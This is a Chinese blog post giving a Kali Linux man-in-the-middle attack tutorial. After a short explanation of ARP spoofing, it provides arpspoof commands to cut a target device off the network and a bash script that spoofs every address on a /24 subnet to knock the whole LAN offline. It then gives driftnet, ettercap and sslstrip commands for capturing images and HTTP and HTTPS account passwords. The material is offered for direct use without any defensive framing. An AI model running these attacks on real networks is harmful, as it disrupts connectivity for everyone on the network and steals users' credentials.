目录
  1. 1. ARP协议
  2. 2. 基本功能
    1. 2.1. ARP攻击的局限性
    2. 2.2. ARP攻击的攻击原理
  3. 3. 准备工作
    1. 3.1. 环境:kali-linux
    2. 3.2. 工具:arpspoof
      1. 3.2.1. 获取自己的网卡,IP,网关信息。
      2. 3.2.2. 获取目标ip与网关信息。
  4. 4. 断网攻击
  5. 5. 群体攻击
  6. 6. 数据抓取
    1. 6.0.1. 抓取使用http协议的网页的图片
    2. 6.0.2. http账户密码获取
    3. 6.0.3. https账户密码获取
kali linux--中间人攻击

ARP协议

ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。

基本功能

通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。

ARP攻击的局限性

ARP攻击仅能在以太网(局域网如:机房、内网、公司网络等)进行。

无法对外网(互联网、非本区域内的局域网)进行攻击。

ARP攻击的攻击原理

ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

准备工作

环境:kali-linux

工具:arpspoof

获取自己的网卡,IP,网关信息。

1
ifconfig
1
ip a

获取目标ip与网关信息。

1
nmap -sP 10.3.138.1/24

断网攻击

1
arpspoof -i eth0 -t 192.168.8.100 192.168.8.8

双向攻击(即欺骗靶机也欺骗路由器)

1
arpspoof -i eth0 -t 192.168.8.8 192.168.8.100

攻击完成,此时被攻击手机无法上网。(ctrl+Z)(ctrl+C)可停止攻击

群体攻击

1
vim arp.sh
1
2
3
4
5
6
7
8
9
10
11
12
#!/usr/bin/bash
#
#Date:2019.09.28
#Author:GZ
#Mail:GZ1903@126.com

echo 0 > /proc/sys/net/ipv4/ip_forward
for i in ` seq 2 254 `
do
nohup arpspoof -i eth0 -t 192.168.8.$i 192.168.8.1 &
nohup arpspoof -i eth0 -t 192.168.8.1 192.168.8.$i &
done

该群体攻击会造成局域网ip与mac地址混乱,任何设备(vnc,ssh,摄像头等联网设备)都不能与外界联网,且市场安全软件与策略不可防御,唯独渗透的kali能正常使用。慎用!!!

数据抓取

首先要开始IP转发功能,linux因为系统安全考虑,是不支持IP转发的,其配置文件写在/proc/sys/net/ipv4的ip_forward中。默认为0,接下来修改为1。

1
echo 1 >/proc/sys/net/ipv4/ip_forward

修改完成后不显示,但可以用 cat /proc/sys/net/ipv4/ip_forward来确实是否修改成功。

抓取使用http协议的网页的图片

1
driftnet -i eth0

弹出对话框!! eth0为监控网卡

http账户密码获取

1
ettercap -Tp -i eth0

https账户密码获取

使https链接还原为http s

1
sslstrip -a -f -k sslstrip
文章作者: GZ
文章链接: https://gz1903.github.io/2019/10/13/kali-linux-中间人攻击/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 GZ's Blog
打赏
  • 微信
  • 支付宝

评论